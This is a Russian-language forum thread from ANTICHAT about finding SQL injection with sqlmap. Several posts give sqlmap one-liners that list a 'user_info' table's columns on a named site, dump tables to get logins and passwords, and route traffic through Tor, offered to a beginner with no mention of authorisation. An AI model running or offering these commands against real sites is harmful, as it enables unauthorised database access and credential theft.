ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
20.09.2018, 11:25
|
|
Новичок
Регистрация: 13.07.2017
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
Здравствуйте, небольшой мануал по поиску SQLi в примерах The SQL Injection Knowledge Base
|
|
|
22.09.2018, 01:12
|
|
Новичок
Регистрация: 02.04.2017
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
Печально когда доходишь до паролей а там AES
|
|
|
|
07.01.2020, 23:50
|
|
Новичок
Регистрация: 07.01.2020
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
И oпять вызываем уже знакомую процедуру --columns (колоночки) но уже по таблице "user_".
Код:
Код:
sqlmap -u http://www.gbhackers.com/cgi-bin/item.cgi?item_id=15 -D gbhackers-T user_info --columns
Далее меня заинтересовало то что в сети находяться 4ре хоста, но в колоночке Избыточность... |
|
|
|
08.01.2020, 16:56
|
|
Новичок
Регистрация: 22.12.2019
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
И что дальше делать?как увидеть логин и пароль?
Яполный ламер,не судите строго. |
|
|
|
08.01.2020, 17:19
|
|
Новичок
Регистрация: 05.08.2018
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
B6D4 сказал(а):
И что дальше делать?как увидеть логин и пароль?
Яполный ламер,не судите строго.
sqlmap --random-agent -u http:/site.php?id=1 -D название базы -T название таблицы -C название колонки --dump
или ещё проще, без названия колонки, вытащит сразу все данные изо всех колонок (применять, если данных мало)
sqlmap --random-agent -u http:/site.php?id=1 -D название базы -T название таблицы --dump
|
|
|
|
13.02.2020, 09:21
|
|
Новичок
Регистрация: 17.09.2019
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
Magnit сказал(а):
Объясните или, если не сложно, дайте ссылку где описано, в чем разница в параметрах --level u --risk
Много инфы, да и на практике CTF не один раз валил БД с --level=5 --risk=3
при включении v3 увидел разницу, что при параметре risk=1 не используются where, он требует risk=3, но что к примеру делает risk=2, и levels не понимаю
спасибо за ответ
Тоже хотелось бы подробнее узнать
|
|
|
|
01.03.2020, 11:25
|
|
Новичок
Регистрация: 11.10.2018
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
Неплохо бы еще добавлять параметры --tor и --check-tor (добавит немножко анонимности в пентест)
|
|
|
|
07.03.2020, 00:28
|
|
Новичок
Регистрация: 02.09.2018
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
Можно ли эти знания применять определенно на 1 сайт или только, те которые имеют подобный дорк ?
|
|
|
|
19.07.2020, 01:24
|
|
Новичок
Регистрация: 19.07.2020
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
самое главное не сказали, а где скачать этот sqlmap
|
|
|
|
21.07.2020, 11:36
|
|
Новичок
Регистрация: 20.07.2020
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
picasoready сказал(а):
самое главное не сказали, а где скачать этот sqlmap
На их официальном сайте. Гугл тебе в помощь. Хотя наверное, это не твое...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
